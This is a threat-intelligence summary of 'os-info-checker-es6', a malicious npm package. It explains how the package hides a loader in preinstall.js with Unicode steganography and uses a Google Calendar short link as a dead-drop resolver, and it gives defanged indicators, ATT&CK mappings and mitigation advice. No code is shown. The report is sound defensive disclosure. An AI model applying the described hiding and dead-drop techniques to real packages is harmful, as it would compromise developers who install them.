Full Report
Cybersecurity researchers have discovered a malicious package named "os-info-checker-es6" that disguises itself as an operating system information utility to stealthily drop a next-stage payload onto compromised systems. "This campaign employs clever Unicode-based steganography to hide its initial malicious code and utilizes a Google Calendar event short link as a dynamic dropper for its final
Analysis Summary
# Tool/Technique: os-info-checker-es6
## Overview
A malicious npm package disguised as an operating system information utility, intended to drop a next-stage payload onto compromised systems using a multi-stage execution chain involving Unicode steganography and a Google Calendar short link as a dynamic dropper/dead drop resolver.
## Technical Details
- Type: Malware (Initial Dropper/Loader stage)
- Platform: JavaScript/Node.js environments (via npm)
- Capabilities: Unicode steganography for initial code hiding, dynamic payload retrieval via trusted external service (Google Calendar), multi-stage execution.
- First Seen: Published March 19, 2025 (Malicious iteration detected May 7, 2025)
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application (Implicitly, via supply chain compromise of the package manager ecosystem)
- TA0002 - Execution
- T1059.006 - Command and Scripting Interpreter: JavaScript
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (Unicode steganography used)
## Functionality
### Core Capabilities
- **Initial Code Hiding:** Uses Unicode "Private Use Access" characters for steganography within the package's code (specifically in `preinstall.js`) to hide the extraction logic and the next-stage URL.
- **Execution Trigger:** Leverages the standard package installation process, specifically invoking scripts like `preinstall.js`.
- **Dynamic Dropper Link:** Contacts a Google Calendar event short link (`calendar.app[.]google/`) to retrieve subsequent instructions or payloads.
### Advanced Features
- **Dead Drop Resolution:** Utilizes a legitimate, trusted service (Google Calendar) as an intermediary to host the reference to the attacker infrastructure, aiming to evade signature and network-based blocking of the initial stages.
- **Multi-Stage Delivery:** Implies a chain where the initial npm package only resolves the next step, suggesting a complex, evolving attack structure.
## Indicators of Compromise
- File Hashes: [Not provided in the article]
- File Names: `os-info-checker-es6` (package name), `preinstall.js` (malicious script file)
- Registry Keys: [Not applicable/provided]
- Network Indicators:
- Initial contact URL component: `calendar.app[.]google/` (Used as a dead drop resolver)
- Decoded C2 IP address: `140.82.54[.]223` (This IP was derived from a Base64 string in the Calendar event title, which acted as the next-stage address/instruction set).
- Behavioral Indicators: Unexpected execution of postinstall/preinstall scripts in npm packages, network connections originating from package installation routines.
## Associated Threat Actors
- Attributed to an attacker or group using the npm user "kim9123". (Likely not a known named APT group, but an unknown actor targeting the software supply chain.)
## Detection Methods
- Signature-based detection: Ineffective against the obfuscated initial stage.
- Behavioral detection: Crucial for detecting execution of unexpected postinstall scripts, file overwrites, and unauthorized outbound traffic occurring during package installation.
- YARA rules: [Not provided in the article, but could target the pattern of Unicode PUA extraction.]
## Mitigation Strategies
- **Version Pinning:** Essential to prevent unexpected updates that could introduce malicious code.
- **Static and Dynamic Analysis:** Thoroughly inspect third-party packages before use, especially those with high-privilege setup scripts.
- **CI/CD Log Inspection:** Closely monitor build logs for suspicious download or execution activities during dependency integration.
- **Trust Validation:** Validate third-party packages and dependencies before allowing them into production environments.
## Related Tools/Techniques
- **Dependent Packages (Suspected Coordinated Campaign):**
- `skip-tot` (lists `os-info-checker-es6` as dependency)
- `vue-dev-serverr`
- `vue-dummyy`
- `vue-bit`
- **Adversarial Techniques Cited (General context):** Typoquatting, Go repository caching abuse, obfuscation, multi-stage execution, abuse of legitimate services.